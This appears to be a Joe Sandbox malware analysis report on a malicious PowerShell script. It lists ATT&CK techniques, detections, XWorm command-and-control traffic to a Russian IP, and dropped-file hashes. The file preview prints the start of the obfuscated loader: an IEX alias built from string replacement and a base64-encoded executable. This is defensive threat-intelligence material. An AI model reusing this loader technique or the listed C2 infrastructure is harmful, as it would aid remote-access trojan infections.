      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 241 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 241 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 212 Process Injection | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      NLXwvLjXPh.ps1 | 16% | ReversingLabs | Script.Trojan.Heuristic |
      NLXwvLjXPh.ps1 | 12% | Virustotal | | Browse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://www.microsoft.co( | 0% | Avira URL Cloud | safe |
      92.255.57.155 | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        92.255.57.155 | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.microsoft.co( | powershell.exe, 00000000.00000002.2410805237.000001FF7F6AB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://go.micro | powershell.exe, 00000000.00000002.2389124323.000001FF0227D000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://contoso.com/ | powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://contoso.com/License | powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://contoso.com/Icon | powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://upx.sf.net | Amcache.hve.0.dr | false | | high
        https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                92.255.57.155 | unknown | Russian Federation | | 42253 | TELSPRU | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1577165
                                Start date and time:2024-12-18 08:14:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 39s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:NLXwvLjXPh.ps1
                                renamed because original name is a hash value
                                Original Sample Name:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859.ps1
                                Detection:MAL
                                Classification:mal100.troj.evad.winPS1@9/13@0/1
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 94%
                                • Number of executed functions: 67
                                • Number of non-executed functions: 3
                                Cookbook Comments:
                                • Found application associated with file extension: .ps1
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 20.190.181.6, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                Time | Type | Description
                                02:15:16 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                02:15:20 | API Interceptor | 5220099x Sleep call for process: RegSvcs.exe modified
                                02:15:22 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
                                02:17:54 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                • 92.255.57.155/1/1.png
                                https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                • 92.255.57.155/1/1.png
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | vsuotNfeN7.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | credit.js | malicious | PureLog Stealer, RHADAMANTHYS | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://pdf-ezy.com/pdf-ezy.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0Z | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharing | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://office.yacivt.com/wriEcFSZ | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Remcos | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | nsdksetup.dll | malicious | Unknown | 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELSPRU | MiGFg375KJ.exe | malicious | XWorm | 92.255.57.155
TELSPRU | anyrunsample.ps1 | malicious | Unknown | 92.255.57.155
TELSPRU | sEOELQpFOB.lnk | malicious | RedLine | 92.255.57.75
TELSPRU | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 92.255.57.75
TELSPRU | fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exe | malicious | Stealc | 92.255.57.89
TELSPRU | LXS5itpTK7.exe | malicious | Stealc | 92.255.57.89
TELSPRU | SEejSLAS9f.exe | malicious | Stealc | 92.255.57.89
TELSPRU | mMgFHz9PdG.exe | malicious | Stealc | 92.255.57.89
TELSPRU | vCZfRWB1kd.exe | malicious | Stealc | 92.255.57.89
TELSPRU | 1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe | malicious | Stealc | 92.255.57.89
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.214016822980835
                                Encrypted:false
                                SSDEEP:192:VtSC0k8Qfqz0BU/Sa6dgt0GsNzuiFUZ24IO8a9:VsCOQfVBU/Sa/tvezuiFUY4IO8a9
                                MD5:25E9D60FAB5D18D7237F89D51A41D2FD
                                SHA1:041F249ECF3A0F1C7ED0E27DD7A793C57675210E
                                SHA-256:1CEFB948D52CD505F98623DD945306EEF8302097DFC208A9A882DA9D6CCBAF3E
                                SHA-512:E49C90492009FFDB71FDA879CF483722E3D11DC425439D3D59FE346C80D58B5F21C0CE1B950487991E8AC84227AD185E7DD698C888F830EB1EF993BBA2C72828
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.5320809411177977
                                Encrypted:false
                                SSDEEP:96:TcrjFNgj/rxYidCRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAJf/VXT5NH:+S/mGCR30m8AzuiFRZ24lO8
                                MD5:5B1F98FEF402E21A5AF07A7EC40EC89B
                                SHA1:5BCA4441FC2A562D8AC51F8571C74301A79CE1EF
                                SHA-256:A8888C92D02D594E7D0376A02D3B12488879586993086C1FA0C8B7E5BC6A166C
                                SHA-512:4AEEC184752BAFB735BF2A1F6E6B667A4FFD5E28FC6E36B782D3ECBEC4B124C99BE7585756FD733691376518043FB57698A161F2A850512A9812DBC004198D47
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:52 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):363027
                                Entropy (8bit):3.4615777568715096
                                Encrypted:false
                                SSDEEP:3072:dq8IpLOLTgLP1D6aEefXS0J0sHJt72SU4uEqey5yA:dqeTgLP1maE2i0SE7PU4DyIA
                                MD5:9AA8A7A1358285ABE36FEA4A29CA24C9
                                SHA1:13FB2D86747C94DBB3DFEEB2CD0B8FCB98D87BDE
                                SHA-256:6760A69EA2F1A6529FCD6CADE52A6B4C19990F29E98B54D2A08291E291E4555D
                                SHA-512:E16D6BA62A306E0F1BB7EF2EA4996ED50F267B209AA56535AA4C48FC64D10E37432727E9AED5C6A83F0BA953E8CDE0DFFAFA038BCC88D1AD7DE71ABE4B60F361
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8352
                                Entropy (8bit):3.6897445483948594
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJGj6S7B6Y/6STgmfZ86LYprn89byMsf1dGm:R6lXJi6o6YySTgmfO6Ldyff1l
                                MD5:A7675020FB9A61685A9D3EDCB7406654
                                SHA1:03FC2EBA2C9D3FD94291961C9F3A28A54EE4863F
                                SHA-256:5B978F6347C77F81142B0EDD6E80F5B5B2B53DDE892C2F77B9DEB8AA9514ADDB
                                SHA-512:60CFDB45BAB21265199031E4EB7A1DD9A01E50BF05065D5A56946B2CFAD705815F0B2FC2765A73ECA89D25B414E59F9074F38F27CADF63BABC681AE1DB4DE5E8
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4728
                                Entropy (8bit):4.441639343111392
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsOJg77aI9alWpW8VYbYm8M4J3cF9+q8vYdmDI2rd:uIjfEI7IU7VLJ0KKmDI2rd
                                MD5:D73316DCCA6A8EBB1DE528D23349FC6F
                                SHA1:6D26AEE937F4918550FE0CB05390FDFECE2C643C
                                SHA-256:9AD0D2AD17817B4E68B2365FD16817C5AEC4E06F4C84C2A85FE186B8D00A4E16
                                SHA-512:AF0A072D1D017DF758FA4C32A214A8963D770569584B35670996E1F9CF43E10E1E1541CC711D3B43A0DF078F53BA49327DAEE6645D299358737544497235A85E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):7286
                                Entropy (8bit):3.7372502766796414
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetblbQ956Y2P7purgmfHNpX6PUZV6l5aMTc9Rm:R6l7wVeJlbO6Y2DpurgmftYULYpgTm
                                MD5:1A96410197BE3A19726CB4F5E7AB3130
                                SHA1:D81D2F9059FD15C1071FF81F04F15B2FA1F64129
                                SHA-256:D8E88BD86E5AC314A7598BEAF8678ED5D2D398D1FA743142BE2440D9370ECA97
                                SHA-512:94D7A9407B5F4096A68D583F7D9E1C6A80063A4F5C135285EB483837398FF689FFEC9B01D684DB309A7FE9D0BB3D686E96E1747C635F6FC18798EB72E2E93A8D
                                Malicious:false
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4905
                                Entropy (8bit):4.690046763747149
                                Encrypted:false
                                SSDEEP:96:uIjf+I71U7VSJFKloFevAFEJLWTzFevAFH2ufld:uISY1U7g455Ksjuf7
                                MD5:A7549B4697FE51392736FDB488968E9D
                                SHA1:8958A99D4D320E0470F63C745EE5F65B14CE4E0E
                                SHA-256:0296DDD2B29E4D346A4A7E09C37BB4F09C17BB14FBFF31331063D0463246D0A3
                                SHA-512:B9EB0A5850AF3F75BF01BEC9F3A2F3FBA39261D420CD85A9B05667F01277FEB2F95BCA7C7E316504E80C2E32DD5A26EC09C30FC215955DC403BD525EF571A981
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1628158735648508
                                Encrypted:false
                                SSDEEP:3:Nllluldhz/lL:NllU
                                MD5:03744CE5681CB7F5E53A02F19FA22067
                                SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7345489224225887
                                Encrypted:false
                                SSDEEP:48:nfD6latO0F3CyFU2UcWukvhkvklCywe30gHClHJCSogZomX0gHCl3CSogZoS1:7pF3CxTqkvhkvCCtngHCHHAgHClHF
                                MD5:1B56B8099DABF7295EAA140C8A6B414B
                                SHA1:C4FAF841452627085C650A62BB688EC158010B2C
                                SHA-256:2A5A64762879EF86A639FF1F21DF27FD61F62AD0A6B30258CB696480CB5BB7E0
                                SHA-512:9ED27353E1201481DDDDE51F7C572733D1A0DA5EF4F94E0F9E65B1981B443904DF565600A6503DC24BDD92A7ABB161FE1BBAC59F09AA5CADC3875D0C999B8D54
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.4730538599003795
                                Encrypted:false
                                SSDEEP:6144:WzZfpi6ceLPx9skLmb0fuZWSP3aJG8nAgeiJRMMhA2zX4WABluuNxjDH5S:4ZHtuZWOKnMM6bFprj4
                                MD5:4E843D1AA1776B60EE98B36BA946A3BA
                                SHA1:B1976D14BD141A173418806046703FD83105F459
                                SHA-256:07839E03D48A2C5F88011D1D0E4F87051E25C51395FF0580A6EE17FA576E1CF1
                                SHA-512:C05EF4418BF8820CFF9FC6553D02858FA8AC92D004BFBBEBFA6902FD42FD20B8F0DE48DCFDFE493140F8B1ECD4CB823F61E360011285734E7FE955869CF63B7B
                                Malicious:false
                                File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                Entropy (8bit):5.159109254828783
                                TrID:
                                  File name:NLXwvLjXPh.ps1
                                  File size:341'157 bytes
                                  MD5:665d34b878bf82d6b6078c1a20cda896
                                  SHA1:a1c03b8df6b114c5a9b557316868f06a2816f4c0
                                  SHA256:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859
                                  SHA512:2a9c9a14fb23d685ba4f3eae00d9b0a5de50965a00fd8dcddfb0d73c9cb84f24c5ff84fd12dfd4323287bf71f6c72f695e447a94db463b1b11dc1685a7045951
                                  SSDEEP:6144:3K4rMAa8DAz7OGxuerPkwn4Je1Z0e9JCrSKQ81J7lHH7urZyrnpGYPoHdolDeZln:yfyNcJrk6TK+
                                  TLSH:BA743C318805B92F8EEF1F87B5402FD37C78217BDF551018A88F16B96A68238597AF74
                                  File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE
                                  Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T08:15:28.448524+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:15:28.448524+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:15:33.428012+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:33.899749+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:15:33.902091+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:45.767192+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:15:45.771661+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:57.671967+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:15:57.674231+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:58.442730+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:09.578020+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:09.580469+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:21.484388+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:21.486706+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:23.488331+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:23.547003+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:23.737970+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:23.800469+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:24.058420+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:24.060029+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:24.200605+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:24.249443+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:24.249538+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:24.341618+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:25.203192+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:25.255032+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:25.394199+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:25.503746+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:27.293989+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:27.295911+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.075972+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:28.083085+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.266958+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:28.269318+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
